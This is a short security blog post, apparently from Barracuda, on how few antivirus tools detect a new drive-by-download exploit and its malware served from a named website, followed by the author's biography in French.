Despite advances in technology that improve the detection efficacy of antivirus (AV) software, identification rates for newly generated threat artifacts continue to be low. As an example, consider the VirusTotal results for malware served this week by drive-by downloads originating from Indowebster[.]com, an Alexa top-ranked website that has regularly appeared in Threatglass during the last several months. Per the aforementioned results, only 8 of 54 tools identify the executable as malicious, and among the many false negatives are the offerings of several popular AV vendors.
Come for a Drive-by Download, Stay for a Microcosm of a Long-standing Issue
Unfortunately, detection results for the exploit content that resulted in retrieval of the malware executable are no better. Per those results, only 8 of 54 tools identify the exploit as malicious. Meanwhile, detections for the deobfuscated version of the exploit are actually lower than those of the obfuscated version, which reveals continued creation of brittle, easily circumvented signatures and heuristics.
If experience is any guide, within one week, detections for both the exploit and the payload should be dramatically improved. While such a timeframe is substantially better than the average delays observed half a decade ago, there is still plenty of room for improvement, as even a several day window provides sufficient time for the attacker to achieve a variety of objectives.
Christine Barry est blogueuse en chef et responsable des réseaux sociaux chez Barracuda. Son travail consiste à rédiger des articles captivants en lien avec les services Barracuda et à faciliter la communication entre le public et les équipes internes. Avant de rejoindre Barracuda, Christine a été ingénieure de terrain et chef de projet dans l'éducation et auprès de PME pendant plus de 15 ans. Elle est titulaire de plusieurs diplômes technologiques, d'une licence de l'université du Michigan, et d'une maîtrise en administration des affaires.
Connectez-vous avec Christine sur LinkedIn.